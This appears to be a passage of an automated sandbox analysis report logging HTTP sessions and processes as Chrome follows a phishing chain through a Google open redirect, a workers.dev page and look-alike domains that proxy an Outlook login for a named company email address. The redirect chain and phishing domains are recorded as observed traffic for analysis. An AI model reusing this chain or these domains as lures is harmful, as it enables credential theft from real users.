                                        Data Ascii: VbJVripKZlpV5mHOMoJ6ckp2le6WBZKNmgGVhpGqEiGuhbYuprbV7kKmNq8G2epmigL+Go7GCoMmbmsqwx4zO0bCTl464lMvIm9qzntuf3eHf4N+iuOPlx87t6+m/7+/sr/f35e/79Mfct+nx2ALD3P0D3N/bwb3qCw/4xvnLD98DzdUS8Bvu5xLw3esD9OHwAN8R9/786RnoABkACTDxFSw29SobNw76NTko/hUALv0AGTM+IxdFHUUIAjAiDE


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.1649745104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:01 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:01 UTC379INHTTP/1.1 404 Not Found
                                        Date: Wed, 08 Jan 2025 23:46:01 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: dNPo6i1PpCcg4Okf0I2pHETPhYkSl3uoWKA=$VIRASkB6PQxJw/ie
                                        Server: cloudflare
                                        CF-RAY: 8ff0108a1e14de98-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:46:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.1649746194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:02 UTC588OUTOPTIONS /?alqrdsrq&qrc=info@acaglobal.com HTTP/1.1
                                        Host: moderntoolbc.org
                                        Connection: keep-alive
                                        Accept: */*
                                        Access-Control-Request-Method: GET
                                        Access-Control-Request-Headers: qrc-auth
                                        Origin: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Dest: empty
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:02 UTC168INHTTP/1.1 200 OK
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: *
                                        Date: Wed, 08 Jan 2025 23:46:02 GMT
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2025-01-08 23:46:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.1649747194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:02 UTC772OUTGET /?alqrdsrq&qrc=info@acaglobal.com HTTP/1.1
                                        Host: moderntoolbc.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        accept: application/json
                                        qrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Origin: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:03 UTC330INHTTP/1.1 200 OK
                                        Set-Cookie: qPdM=2gi159Ei5Q4n; path=/; samesite=none; secure; httponly
                                        Set-Cookie: qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI; path=/; samesite=none; secure; httponly
                                        content-type: application/json
                                        Access-Control-Allow-Origin: *
                                        Date: Wed, 08 Jan 2025 23:46:03 GMT
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2025-01-08 23:46:03 UTC325INData Raw: 31 33 39 0d 0a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 61 73 6b 2e 63 6f 2e 63 6f 6d 2f 3f 64 61 74 61 58 58 30 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 31 63 6d 77 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 46 68 63 32 73 75 59 32 38 75 59 32 39 74 4c 79 49 73 49 6d 52 76 62 57 46 70 62 69 49 36 49 6d 46 68 63 32 73 75 59 32 38 75 59 32 39 74 49 69 77 69 61 32 56 35 49 6a 6f 69 4d 6d 64 70 4d 54 55 35 52 57 6b 31 55 54 52 75 49 69 77 69 63 58 4a 6a 49 6a 6f 69 61 57 35 6d 62 30 42 68 59 32 46 6e 62 47 39 69 59 57 77 75 59 32 39 74 49 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 4d 32 4d 7a 63 35 4f 54 59 7a 4c 43 4a 6c 65 48 41 69 4f 6a 45 33 4d 7a 59 7a 4f 44 41 77
                                        Data Ascii: 139{"url":"https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAw


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.1649748194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:04 UTC995OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAwODN9.9mfmPJ6Tz293gVpDft9Bh8PbCFN6r0rJETWVrutJxQo HTTP/1.1
                                        Host: aask.co.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:04 UTC307INHTTP/1.1 302 Found
                                        Set-Cookie: qPdM=2gi159Ei5Q4n; path=/; samesite=none; secure; httponly
                                        Set-Cookie: qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI; path=/; samesite=none; secure; httponly
                                        location: /?qrc=info%40acaglobal.com
                                        Date: Wed, 08 Jan 2025 23:46:04 GMT
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2025-01-08 23:46:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.1649750194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:04 UTC372OUTGET /?alqrdsrq&qrc=info@acaglobal.com HTTP/1.1
                                        Host: moderntoolbc.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:04 UTC445INHTTP/1.1 302 Found
                                        Set-Cookie: qPdM=b2LP0Q7ttQSa; path=/; samesite=none; secure; httponly
                                        Set-Cookie: qPdM.sig=57OkVDslWv_gQHM9EqrpexG1MhM; path=/; samesite=none; secure; httponly
                                        location: /?alqrdsrq=2c501db8a0abfeaec0044cc37e4ba615f256710ed6b5e6c0c3ac509d713b24ad0c609db15d0c265c77843f8250dae7252fd1caf08944af6274852154f68f1cee&qrc=info%40acaglobal.com
                                        Date: Wed, 08 Jan 2025 23:46:04 GMT
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2025-01-08 23:46:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.1649749194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:04 UTC815OUTGET /?qrc=info%40acaglobal.com HTTP/1.1
                                        Host: aask.co.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: qPdM=2gi159Ei5Q4n; qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI
                                        2025-01-08 23:46:04 UTC1242INHTTP/1.1 302 Moved Temporarily
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Location: https://aask.co.com/mail/?login_hint=info%40acaglobal.com
                                        Server: Microsoft-IIS/10.0
                                        request-id: 39267199-f589-2003-3fb9-720328cc928c
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        X-FEServer: FR0P281CA0159, FR0P281CA0159
                                        X-RequestId: a4f7ca9b-6107-4571-9383-b754ed0146ca
                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                        X-FEProxyInfo: FR0P281CA0159.DEUP281.PROD.OUTLOOK.COM
                                        X-FEEFZInfo: HHN
                                        MS-CV: mXEmOYn1AyA/uXIDKMySjA.0
                                        X-Powered-By: ASP.NET
                                        Date: Wed, 08 Jan 2025 23:46:04 GMT
                                        Connection: close
                                        Content-Length: 0
                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.1649751194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:05 UTC568OUTGET /?alqrdsrq=2c501db8a0abfeaec0044cc37e4ba615f256710ed6b5e6c0c3ac509d713b24ad0c609db15d0c265c77843f8250dae7252fd1caf08944af6274852154f68f1cee&qrc=info%40acaglobal.com HTTP/1.1
                                        Host: moderntoolbc.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: qPdM=b2LP0Q7ttQSa; qPdM.sig=57OkVDslWv_gQHM9EqrpexG1MhM
                                        2025-01-08 23:46:05 UTC142INHTTP/1.1 200 OK
                                        Content-Type: text/html;charset=UTF-8
                                        Date: Wed, 08 Jan 2025 23:46:05 GMT
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2025-01-08 23:46:05 UTC3271INData Raw: 63 62 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d
                                        Data Ascii: cbb<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.1649752194.87.71.2354432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:05 UTC827OUTGET /mail/?login_hint=info%40acaglobal.com HTTP/1.1
                                        Host: aask.co.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: qPdM=2gi159Ei5Q4n; qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI
                                        2025-01-08 23:46:05 UTC1498INHTTP/1.1 417 Expectation Failed
                                        Server: Microsoft-IIS/10.0
                                        request-id: 36710a5e-6092-ede9-6f60-91b5d0d9f10b
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        X-PreferredRoutingKeyDiagnostics: 0
                                        X-CalculatedFETarget: FR4P281CU025.internal.outlook.com
                                        X-BackEndHttpStatus: 417, 417
                                        X-CalculatedBETarget: FR6P281MB4598.DEUP281.PROD.OUTLOOK.COM
                                        x-besku: UNKNOWN
                                        X-RUM-Validated: 1
                                        X-RUM-NotUpdateQueriedPath: 1
                                        X-RUM-NotUpdateQueriedDbCopy: 1
                                        X-Proxy-RoutingCorrectness: 1
                                        X-Proxy-BackendServerStatus: 417
                                        X-BEPartition: Clique/CLDEUP281FRA04
                                        X-FEProxyInfo: FR0P281CA0156.DEUP281.PROD.OUTLOOK.COM
                                        X-FEEFZInfo: HHN
                                        MS-CV: XgpxNpJg6e1vYJG10NnxCw.1.1
                                        X-FEServer: FR4P281CA0371, FR0P281CA0156
                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                        X-FirstHopCafeEFZ: HHN
                                        X-Powered-By: ASP.NET
                                        Date: Wed, 08 Jan 2025 23:46:04 GMT
                                        Connection: close
                                        Content-Length: 0
                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:18:45:42
                                        Start date:08/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:1
                                        Start time:18:45:42
                                        Start date:08/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,10359304098874656515,12441451317658416628,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:2
                                        Start time:18:45:43
                                        Start date:08/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t"
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly